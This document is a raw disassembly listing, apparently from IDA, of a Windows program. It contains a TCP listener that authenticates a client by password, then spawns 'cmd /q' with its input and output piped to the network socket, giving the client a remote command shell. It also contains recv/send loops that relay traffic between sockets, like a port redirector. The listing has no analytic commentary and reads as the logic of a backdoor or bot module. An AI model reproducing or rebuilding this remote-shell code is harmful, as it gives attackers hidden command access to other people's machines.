push edi
push eax
push offset sub_411123
push edi
push edi
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_30]
imul ecx, 234h
cmp eax, edi
mov dword_43E924[ecx], eax
jz short loc_4110DF
loc_41108C: ; CODE XREF: sub_410F3C+15D�j
cmp [ebp+var_20], edi
jnz short loc_41109B
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_41108C
; ---------------------------------------------------------------------------
loc_41109B: ; CODE XREF: sub_410F3C+153�j
mov ebx, 1000h
loc_4110A0: ; CODE XREF: sub_410F3C+19F�j
push ebx ; Size
lea eax, [ebp+var_1344]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_1344]
push edi
push ebx
push eax
push dword ptr [esi]
call dword_4CB9EC ; recv
cmp eax, edi
jle short loc_4110F2
push edi
push eax
lea eax, [ebp+var_1344]
push eax
push [ebp+arg_0]
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_4110A0
jmp short loc_4110F2
; ---------------------------------------------------------------------------
loc_4110DF: ; CODE XREF: sub_410F3C+14E�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_435214 ; "-"
call sub_415DAC
pop ecx
pop ecx
loc_4110F2: ; CODE XREF: sub_410F3C+44�j
; sub_410F3C+A0�j ...
mov eax, [ebp+var_4]
imul eax, 234h
push dword_43E91C[eax]
call dword_4CBA6C ; closesocket
push [ebp+arg_0]
call dword_4CBA6C ; closesocket
push [ebp+var_4]
call sub_40B6D6
pop ecx
push edi
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
pop ebx
sub_410F3C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411123 proc near ; DATA XREF: sub_410F3C+130�o
Dst = byte ptr -1128h
var_128 = byte ptr -128h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1128h
call __alloca_probe
mov eax, [ebp+arg_0]
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_128]
rep movsd
mov esi, [ebp+var_14]
mov dword ptr [eax+124h], 1
imul esi, 234h
mov edi, 1000h
loc_41115A: ; CODE XREF: sub_411123+7C�j
push edi ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
push 0
push edi
push eax
push dword_43E920[esi]
call dword_4CB9EC ; recv
test eax, eax
jle short loc_4111A1
push 0
push eax
lea eax, [ebp+Dst]
push eax
push dword_43E91C[esi]
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_41115A
loc_4111A1: ; CODE XREF: sub_411123+61�j
push dword_43E920[esi]
call dword_4CBA6C ; closesocket
push [ebp+var_14]
call sub_40B6D6
pop ecx
push 0
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
sub_411123 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4111C0 proc near ; DATA XREF: sub_41144E+1BE�o
var_3D4 = byte ptr -3D4h
Str1 = byte ptr -350h
var_208 = dword ptr -208h
var_1F4 = dword ptr -1F4h
var_1F0 = dword ptr -1F0h
var_F0 = byte ptr -0F0h
Dest = byte ptr -0B0h
var_4C = byte ptr -4Ch
var_3C = byte ptr -3Ch
Args = byte ptr -2Ch
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 78h
mov esi, eax
pop ecx
lea edi, [ebp+var_3D4]
push 1
mov [ebp+var_C], 1Eh
pop ebx
rep movsd
mov [eax+1DCh], ebx
mov eax, [ebp+var_208]
mov [ebp+arg_0], eax
imul eax, 234h
lea esi, dword_43E91C[eax]
xor edi, edi
mov [ebp+var_8], edi
mov [ebp+var_1F4], ebx
mov eax, [esi]
mov [ebp+var_1F0], eax
lea eax, [ebp+var_C]
push eax
push edi
lea eax, [ebp+var_1F4]
push edi
push eax
push edi
call dword_4CB9BC ; select
test eax, eax
jnz short loc_411244
push dword ptr [esi]
call dword_4CBA6C ; closesocket
push [ebp+arg_0]
call sub_40B6D6
pop ecx
push edi
call ds:dword_4270D4 ; ExitThread
loc_411244: ; CODE XREF: sub_4111C0+6A�j
push edi
lea eax, [ebp+var_3C]
push ebx
push eax
push dword ptr [esi]
call dword_4CB9EC ; recv
lea eax, [ebp+Args]
push 10h
push eax
push dword ptr [esi]
call sub_4113C5
lea eax, [ebp+var_4C]
push 10h
push eax
push dword ptr [esi]
call sub_4113C5
lea eax, [ebp+var_F0]
push 40h
push eax
push dword ptr [esi]
call sub_4113C5
add esp, 24h
lea eax, [ebp+var_4]
mov [ebp+var_4], 10h
push eax
lea eax, [ebp+var_1C]
push eax
push dword ptr [esi]
call dword_4CB928 ; getpeername
test eax, eax
jz short loc_4112BD
call dword_4CB968 ; WSAGetLastError
push eax ; Args
push offset asc_43532C ; "-"
call sub_415DAC
push [ebp+arg_0]
call sub_40B6D6
add esp, 0Ch
push edi
call ds:dword_4270D4 ; ExitThread
loc_4112BD: ; CODE XREF: sub_4111C0+D8�j
push 2
lea eax, [ebp+var_18]
push 4
push eax
call dword_4CB98C ; gethostbyaddr
cmp eax, edi
jnz short loc_4112E7
push [ebp+var_18]
call dword_4CBA60 ; inet_ntoa
push eax ; Format
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
jmp short loc_4112F5
; ---------------------------------------------------------------------------
loc_4112E7: ; CODE XREF: sub_4111C0+10D�j
push dword ptr [eax] ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strcpy
loc_4112F5: ; CODE XREF: sub_4111C0+125�j
pop ecx
pop ecx
push edi
push ebx
push offset byte_43DB88
push dword ptr [esi]
call dword_4CBA24 ; send
cmp dword_4CE72C, edi
jnz short loc_411357
push [ebp+var_18]
lea eax, [ebp+Str1]
push eax ; Str1
lea eax, [ebp+Dest]
push eax ; int
lea eax, [ebp+Args]
push eax ; Args
call sub_41141F
add esp, 10h
test eax, eax
jnz short loc_411357
push edi
push 13h
push offset aPermissionDeni ; "Permission denied\n"
push dword ptr [esi]
call dword_4CBA24 ; send
push dword ptr [esi]
call dword_4CBA6C ; closesocket
push [ebp+arg_0]
call sub_40B6D6
pop ecx
push edi
call ds:dword_4270D4 ; ExitThread
loc_411357: ; CODE XREF: sub_4111C0+14C�j
; sub_4111C0+16D�j
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Args]
push eax ; Args
push offset asc_4352F0 ; "-"
call sub_415DAC
push [ebp+arg_0]
call sub_4116D6
add esp, 10h
test eax, eax
jnz short loc_41139E
call ds:dword_427094 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_4352C4 ; "-"
call sub_415DAC
push [ebp+arg_0]
call sub_40B6D6
add esp, 0Ch
push ebx
call ds:dword_4270D4 ; ExitThread
loc_41139E: ; CODE XREF: sub_4111C0+1B9�j
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Args]
push eax ; Args
push offset asc_435298 ; "-"
call sub_415DAC
push [ebp+arg_0]
call sub_40B6D6
add esp, 10h
push edi
call ds:dword_4270D4 ; ExitThread
sub_4111C0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4113C5 proc near ; CODE XREF: sub_4111C0+9A�p
; sub_4111C0+A7�p ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push esi
push 0
lea eax, [ebp+var_1]
push 1
push eax
push [ebp+arg_0]
call dword_4CB9EC ; recv
cmp eax, 1
jnz short loc_411415
mov esi, [ebp+arg_4]
loc_4113E3: ; CODE XREF: sub_4113C5+41�j
mov al, [ebp+var_1]
mov [esi], al
inc esi
dec [ebp+arg_8]
jz short loc_41140A
test al, al
jz short loc_411419
push 0
lea eax, [ebp+var_1]
push 1
push eax
push [ebp+arg_0]
call dword_4CB9EC ; recv
cmp eax, 1
jz short loc_4113E3
jmp short loc_411415
; ---------------------------------------------------------------------------
loc_41140A: ; CODE XREF: sub_4113C5+27�j
push offset asc_435358 ; "-"
call sub_415DAC
pop ecx
loc_411415: ; CODE XREF: sub_4113C5+19�j
; sub_4113C5+43�j
xor eax, eax
jmp short loc_41141C
; ---------------------------------------------------------------------------
loc_411419: ; CODE XREF: sub_4113C5+2B�j
push 1
pop eax
loc_41141C: ; CODE XREF: sub_4113C5+52�j
pop esi
leave
retn
sub_4113C5 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_41141F(char *Args,int,char *Str1)
sub_41141F proc near ; CODE XREF: sub_4111C0+163�p
Args = dword ptr 4
arg_4 = dword ptr 8
Str1 = dword ptr 0Ch
push [esp+Args] ; Str2
push [esp+4+Str1] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_41144A
push [esp+arg_4]
push [esp+4+Args] ; Args
push offset asc_435384 ; "-"
call sub_415DAC
add esp, 0Ch
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41144A: ; CODE XREF: sub_41141F+11�j
push 1
pop eax
retn
sub_41141F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41144E proc near ; DATA XREF: sub_401ACD+237A�o
var_5DC = dword ptr -5DCh
var_5A4 = byte ptr -5A4h
Source = byte ptr -414h
var_214 = dword ptr -214h
Str = byte ptr -210h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_24 = byte ptr -24h
Dst = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5A4h
mov eax, [ebp+arg_0]
push esi
push edi
push 78h
pop ecx
mov esi, eax
lea edi, [ebp+var_214]
push 1
rep movsd
pop edi
mov [eax+1DCh], edi
lea eax, [ebp+var_5A4]
push eax
push 202h
call dword_4CB944 ; WSAStartup
xor esi, esi
cmp eax, esi
jz short loc_4114A7
push eax ; Args
push offset asc_4354F4 ; "-"
call sub_415DAC
push [ebp+var_4C]
call sub_40B6D6
add esp, 0Ch
push edi
call ds:dword_4270D4 ; ExitThread
loc_4114A7: ; CODE XREF: sub_41144E+3A�j
push edi
push offset loc_4116CC
call ds:dword_42712C ; SetConsoleCtrlHandler
test eax, eax
jnz short loc_4114E0
call ds:dword_427094 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_4354B0 ; "-"
call sub_415DAC
pop ecx
pop ecx
call dword_4CB92C ; WSACleanup
push [ebp+var_4C]
call sub_40B6D6
pop ecx
push edi
call ds:dword_4270D4 ; ExitThread
loc_4114E0: ; CODE XREF: sub_41144E+67�j
push ebx
push 10h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_50]
call dword_4CB9D4 ; htons
push 6
push edi
push 2
mov [ebp+var_1E], ax
mov [ebp+var_1C], esi
call dword_4CBA54 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_411657
mov eax, [ebp+var_4C]
push 10h
imul eax, 234h
mov dword_43E91C[eax], ebx
lea eax, [ebp+Dst]
push eax
push ebx
call dword_4CBA00 ; bind
test eax, eax
jnz loc_411657
push 7FFFFFFFh
push ebx
call dword_4CB9FC ; listen
test eax, eax
jnz loc_411657
push offset unk_435474
mov [ebp+var_10], 0Ch
mov [ebp+var_C], esi
mov [ebp+var_8], esi
call sub_415D38
pop ecx
mov [ebp+arg_0], edi
loc_41156F: ; CODE XREF: sub_41144E+15A�j
; sub_41144E+1E4�j
lea eax, [ebp+var_4]
mov [ebp+var_4], 10h
push eax
lea eax, [ebp+var_34]
push eax
push ebx
call dword_4CBA68 ; accept
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_41165A
push [ebp+arg_0]
lea eax, [ebp+arg_0]
push eax
push 8
push 0FFFFh
push edi
call dword_4CB9B4 ; setsockopt
cmp eax, 0FFFFFFFFh
jz short loc_41156F
movzx eax, [ebp+var_32]
push [ebp+var_4C]
mov [ebp+var_38], esi
push eax
push [ebp+var_30]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+Source]
push offset asc_435430 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Source]
push eax
call sub_415D38
push edi ; int
lea eax, [ebp+Source]
push 9 ; int
push eax ; Source
call sub_40B3BA
mov [ebp+var_48], eax
imul eax, 234h
mov ecx, [ebp+var_4C]
add esp, 24h
mov dword_43E914[eax], ecx
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_214]
push esi
push eax
push offset sub_4111C0
lea eax, [ebp+var_10]
push esi
push eax
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_48]
imul ecx, 234h
cmp eax, esi
mov dword_43E924[ecx], eax
jz short loc_411642
loc_41162F: ; CODE XREF: sub_41144E+1F2�j
cmp [ebp+var_38], esi
jnz loc_41156F
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_41162F
; ---------------------------------------------------------------------------
loc_411642: ; CODE XREF: sub_41144E+1DF�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_4353F4 ; "-"
call sub_415DAC
pop ecx
pop ecx
jmp short loc_41165A
; ---------------------------------------------------------------------------
loc_411657: ; CODE XREF: sub_41144E+C8�j
; sub_41144E+EC�j ...
mov edi, [ebp+arg_0]
loc_41165A: ; CODE XREF: sub_41144E+13C�j
; sub_41144E+207�j
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+Source]
push offset asc_4353BC ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_3C], esi
jnz short loc_41169A
push esi ; int
lea eax, [ebp+Source]
push [ebp+var_40] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_214] ; int
call sub_409869
add esp, 14h
loc_41169A: ; CODE XREF: sub_41144E+22A�j
lea eax, [ebp+Source]
push eax
call sub_415D38
pop ecx
push edi
call dword_4CBA6C ; closesocket
push ebx
call dword_4CBA6C ; closesocket
call dword_4CB92C ; WSACleanup
push [ebp+var_4C]
call sub_40B6D6
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
pop ebx
loc_4116CC: ; DATA XREF: sub_41144E+5A�o
xor eax, eax
cmp [esp+5E0h+var_5DC], eax
setz al
retn
sub_41144E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4116D6 proc near ; CODE XREF: sub_4111C0+1AF�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push edi
call sub_411827
imul edi, 234h
mov esi, eax
xor ebx, ebx
mov eax, dword_43E91C[edi]
mov [ebp+var_C], 0Ch
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [esi+0Ch], eax
mov edi, ds:dword_427084
pop ecx
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_4119F9
lea eax, [ebp+var_C]
push ebx
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+10h], eax
jnz short loc_411741
call ds:dword_427094 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_435554 ; "-"
call sub_415DAC
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
pop ecx
jmp short loc_41177B
; ---------------------------------------------------------------------------
loc_411741: ; CODE XREF: sub_4116D6+50�j
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_411AAB
lea eax, [ebp+var_C]
push ebx
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+14h], eax
jnz short loc_411782
call ds:dword_427094 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_435554 ; "-"
call sub_415DAC
pop ecx
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
push ebx
push dword ptr [esi+14h]
call ds:dword_4270B4 ; TerminateThread
loc_41177B: ; CODE XREF: sub_4116D6+69�j
xor eax, eax
jmp loc_411822
; ---------------------------------------------------------------------------
loc_411782: ; CODE XREF: sub_4116D6+82�j
mov eax, [esi+10h]
push 0FFFFFFFFh
mov [ebp+var_18], eax
mov eax, [esi+14h]
mov [ebp+var_14], eax
mov eax, [esi+8]
mov [ebp+var_10], eax
lea eax, [ebp+var_18]
push ebx
push eax
push 3
call ds:dword_427130 ; WaitForMultipleObjects
sub eax, ebx
jz short loc_4117DC
dec eax
jz short loc_4117D6
dec eax
jz short loc_4117C2
call ds:dword_427094 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_435520 ; "-"
call sub_415DAC
pop ecx
pop ecx
jmp short loc_4117F1
; ---------------------------------------------------------------------------
loc_4117C2: ; CODE XREF: sub_4116D6+D5�j
mov edi, ds:dword_4270B4
push ebx
push dword ptr [esi+14h]
call edi ; TerminateThread
push ebx
push dword ptr [esi+10h]
call edi ; TerminateThread
jmp short loc_4117F1
; ---------------------------------------------------------------------------
loc_4117D6: ; CODE XREF: sub_4116D6+D2�j
push ebx
push dword ptr [esi+10h]
jmp short loc_4117E0
; ---------------------------------------------------------------------------
loc_4117DC: ; CODE XREF: sub_4116D6+CF�j
push ebx
push dword ptr [esi+14h]
loc_4117E0: ; CODE XREF: sub_4116D6+104�j
call ds:dword_4270B4 ; TerminateThread
push 1
push dword ptr [esi+8]
call ds:dword_4270FC ; TerminateProcess
loc_4117F1: ; CODE XREF: sub_4116D6+EA�j
; sub_4116D6+FE�j
push dword ptr [esi+10h]
mov edi, ds:dword_427070
call edi ; CloseHandle
push dword ptr [esi+14h]
call edi ; CloseHandle
push dword ptr [esi+8]
call edi ; CloseHandle
push dword ptr [esi]
call edi ; CloseHandle
push dword ptr [esi+4]
call edi ; CloseHandle
push dword ptr [esi+0Ch]
call dword_4CBA6C ; closesocket
push esi
call sub_41BA91
pop ecx
push 1
pop eax
loc_411822: ; CODE XREF: sub_4116D6+A7�j
pop edi
pop esi
pop ebx
leave
retn
sub_4116D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411827 proc near ; CODE XREF: sub_4116D6+D�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
xor edi, edi
push 18h ; Size
mov [ebp+var_4], edi
mov [ebp+var_8], edi
call _malloc
mov esi, eax
pop ecx
cmp esi, edi
jz loc_411911
mov ebx, ds:dword_427108
lea eax, [ebp+var_14]
push edi
push eax
lea eax, [ebp+var_8]
mov [esi], edi
push eax
mov [esi+4], edi
push esi
mov [ebp+var_14], 0Ch
mov [ebp+var_10], edi
mov [ebp+var_C], 1
call ebx ; CreatePipe
mov edi, ds:dword_427070
test eax, eax
jnz short loc_41188A
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_435604
jmp short loc_4118AA
; ---------------------------------------------------------------------------
loc_41188A: ; CODE XREF: sub_411827+53�j
lea eax, [ebp+var_14]
push 0
push eax
lea eax, [esi+4]
push eax
lea eax, [ebp+var_4]
push eax
call ebx ; CreatePipe
test eax, eax
jnz short loc_4118B2
call ds:dword_427094 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_4355C4 ; "-"
loc_4118AA: ; CODE XREF: sub_411827+61�j
call sub_415DAC
pop ecx
jmp short loc_4118E0
; ---------------------------------------------------------------------------
loc_4118B2: ; CODE XREF: sub_411827+75�j
push [ebp+arg_0]
push [ebp+var_8]
push [ebp+var_4]
call sub_411920
add esp, 0Ch
mov [esi+8], eax
push [ebp+var_4]
call edi ; CloseHandle
push [ebp+var_8]
call edi ; CloseHandle
cmp dword ptr [esi+8], 0
jnz short loc_411915
push offset unk_43559C
call sub_415D38
loc_4118E0: ; CODE XREF: sub_411827+89�j
cmp [ebp+var_4], 0
pop ecx
jz short loc_4118EC
push [ebp+var_4]
call edi ; CloseHandle
loc_4118EC: ; CODE XREF: sub_411827+BE�j
cmp [ebp+var_8], 0
jz short loc_4118F7
push [ebp+var_8]
call edi ; CloseHandle
loc_4118F7: ; CODE XREF: sub_411827+C9�j
mov eax, [esi]
test eax, eax
jz short loc_411900
push eax
call edi ; CloseHandle
loc_411900: ; CODE XREF: sub_411827+D4�j
mov eax, [esi+4]
test eax, eax
jz short loc_41190A
push eax
call edi ; CloseHandle
loc_41190A: ; CODE XREF: sub_411827+DE�j
push esi
call sub_41BA91
pop ecx
loc_411911: ; CODE XREF: sub_411827+1D�j
xor eax, eax
jmp short loc_41191B
; ---------------------------------------------------------------------------
loc_411915: ; CODE XREF: sub_411827+AD�j
or dword ptr [esi+0Ch], 0FFFFFFFFh
mov eax, esi
loc_41191B: ; CODE XREF: sub_411827+EC�j
pop edi
pop esi
pop ebx
leave
retn
sub_411827 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411920 proc near ; CODE XREF: sub_411827+94�p
Dst = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
push 44h
pop edi
xor esi, esi
push edi ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
mov [ebp+var_4], esi
call _memset
push 10h ; Size
lea eax, [ebp+var_14]
push esi ; Val
push eax ; Dst
call _memset
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
add esp, 18h
mov [ebp+var_20], eax
lea eax, [ebp+var_18]
mov [ebp+Dst], edi
mov edi, ds:dword_427104
push esi
push 1
push 2
push eax
mov [ebp+var_54], esi
mov [ebp+var_4C], esi
mov [ebp+var_50], esi
mov [ebp+var_3C], esi
mov [ebp+var_40], esi
mov [ebp+var_44], esi
mov [ebp+var_48], esi
mov [ebp+var_28], si
mov [ebp+var_24], esi
mov [ebp+var_26], si
mov [ebp+var_2C], 101h
mov [ebp+var_1C], ebx
call edi ; GetCurrentProcess
push eax
push ebx
call edi ; GetCurrentProcess
push eax
call ds:dword_427100 ; DuplicateHandle
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+Dst]
push eax
push esi
push esi
push esi
push 1
push esi
push esi
push offset aCmdQ ; "cmd /q"
push esi
call ds:dword_427074 ; CreateProcessA
test eax, eax
jz short loc_4119DC
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_C]
imul eax, 234h
push [ebp+var_10]
mov esi, [ebp+var_14]
mov dword_43E918[eax], ecx
call ds:dword_427070 ; CloseHandle
jmp short loc_4119F2
; ---------------------------------------------------------------------------
loc_4119DC: ; CODE XREF: sub_411920+9A�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax ; Args
push offset asc_435644 ; "-"
call sub_415DAC
mov esi, [ebp+var_4]
pop ecx
pop ecx
loc_4119F2: ; CODE XREF: sub_411920+BA�j
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_411920 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4119F9 proc near ; DATA XREF: sub_4116D6+3F�o
var_1B0 = byte ptr -1B0h
var_C8 = byte ptr -0C8h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B0h
push ebx
push esi
mov ebx, ds:dword_4270EC
push edi
mov edi, [ebp+arg_0]
lea eax, [ebp+arg_0]
push 0
push eax
lea eax, [ebp+var_C8]
push 0C8h
push eax
push dword ptr [edi]
loc_411A22: ; CODE XREF: sub_4119F9+8F�j
call ebx ; ReadFile
test eax, eax
jz short loc_411A8A
xor eax, eax
xor dl, dl
xor esi, esi
cmp [ebp+arg_0], eax
jbe short loc_411A5D
loc_411A33: ; CODE XREF: sub_4119F9+62�j
mov cl, [ebp+esi+var_C8]
cmp cl, 0Ah
jnz short loc_411A4D
cmp dl, 0Dh
jz short loc_411A4D
mov [ebp+eax+var_1B0], 0Dh
inc eax
loc_411A4D: ; CODE XREF: sub_4119F9+44�j
; sub_4119F9+49�j
mov [ebp+eax+var_1B0], cl
inc eax
inc esi
mov dl, cl
cmp esi, [ebp+arg_0]
jb short loc_411A33
loc_411A5D: ; CODE XREF: sub_4119F9+38�j
push 0
push eax
lea eax, [ebp+var_1B0]
push eax
push dword ptr [edi+0Ch]
call dword_4CBA24 ; send
test eax, eax
jle short loc_411A8A
lea eax, [ebp+arg_0]
push 0
push eax
lea eax, [ebp+var_C8]
push 0C8h
push eax
push dword ptr [edi]
jmp short loc_411A22
; ---------------------------------------------------------------------------
loc_411A8A: ; CODE XREF: sub_4119F9+2D�j
; sub_4119F9+79�j
mov esi, ds:dword_427094
call esi ; RtlGetLastWin32Error
cmp eax, 6Dh
jz short loc_411AA6
call esi ; RtlGetLastWin32Error
push eax ; Args
push offset asc_435684 ; "-"
call sub_415DAC
pop ecx
pop ecx
loc_411AA6: ; CODE XREF: sub_4119F9+9C�j
pop edi
pop esi
pop ebx
leave
retn
sub_4119F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411AAB proc near ; DATA XREF: sub_4116D6+71�o
var_DC = byte ptr -0DCh
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0DCh
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_0]
xor esi, esi
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
loc_411AC4: ; CODE XREF: sub_411AAB+39�j
; sub_411AAB+D7�j ...
push ebx
lea eax, [ebp+arg_0+3]
push 1
push eax
push dword ptr [edi+0Ch]
call dword_4CB9EC ; recv
test eax, eax
jle loc_411BC9
cmp [ebp+var_10], ebx
jbe short loc_411AE6
dec [ebp+var_10]
jmp short loc_411AC4
; ---------------------------------------------------------------------------
loc_411AE6: ; CODE XREF: sub_411AAB+34�j
mov al, byte ptr [ebp+arg_0+3]
movsx ecx, al
cmp ecx, 0FFh
jz loc_411BA9
cmp al, 8
mov [ebp+var_C], ebx
jz short loc_411B56
cmp al, 7Fh
jz short loc_411B56
cmp al, 3
jnz short loc_411B11
push ebx
push ebx
call ds:dword_427134 ; GenerateConsoleCtrlEvent
jmp short loc_411B7D
; ---------------------------------------------------------------------------
loc_411B11: ; CODE XREF: sub_411AAB+5A�j
cmp al, 15h
jnz short loc_411B33
xor esi, esi
mov [ebp+var_8], 20h
mov [ebp+var_7], 58h
mov [ebp+var_6], 58h
mov [ebp+var_5], 58h
mov [ebp+var_4], 0Dh
mov [ebp+var_3], 0Ah
push 6
jmp short loc_411B69
; ---------------------------------------------------------------------------
loc_411B33: ; CODE XREF: sub_411AAB+68�j
mov [ebp+esi+var_DC], al
inc esi
push 1
cmp al, 0Dh
mov [ebp+var_8], al
pop ecx
jnz short loc_411B6A
mov [ebp+esi+var_DC], 0Ah
mov [ebp+var_7], 0Ah
inc esi
push 2
jmp short loc_411B69
; ---------------------------------------------------------------------------
loc_411B56: ; CODE XREF: sub_411AAB+52�j
; sub_411AAB+56�j
cmp esi, ebx
jbe short loc_411B80
dec esi
mov [ebp+var_8], 8
mov [ebp+var_7], 20h
mov [ebp+var_6], 8
push 3
loc_411B69: ; CODE XREF: sub_411AAB+86�j
; sub_411AAB+A9�j
pop ecx
loc_411B6A: ; CODE XREF: sub_411AAB+98�j
push ebx
lea eax, [ebp+var_8]
push ecx
push eax
push dword ptr [edi+0Ch]
call dword_4CBA24 ; send
test eax, eax
jle short loc_411BC9
loc_411B7D: ; CODE XREF: sub_411AAB+64�j
mov al, byte ptr [ebp+arg_0+3]
loc_411B80: ; CODE XREF: sub_411AAB+AD�j
cmp al, 0Dh
jnz loc_411AC4
lea eax, [ebp+var_14]
push ebx
push eax
lea eax, [ebp+var_DC]
push esi
push eax
push dword ptr [edi+4]
call ds:dword_4270F0 ; WriteFile
test eax, eax
jz short loc_411BC9
xor esi, esi
jmp loc_411AC4
; ---------------------------------------------------------------------------
loc_411BA9: ; CODE XREF: sub_411AAB+47�j
cmp [ebp+var_C], ebx
jnz short loc_411BBA
mov [ebp+var_C], 1
jmp loc_411AC4
; ---------------------------------------------------------------------------
loc_411BBA: ; CODE XREF: sub_411AAB+101�j
mov [ebp+var_10], 0Ah
mov [ebp+var_C], ebx
jmp loc_411AC4
; ---------------------------------------------------------------------------
loc_411BC9: ; CODE XREF: sub_411AAB+2B�j
; sub_411AAB+D0�j ...
pop edi
pop esi
pop ebx
leave
retn
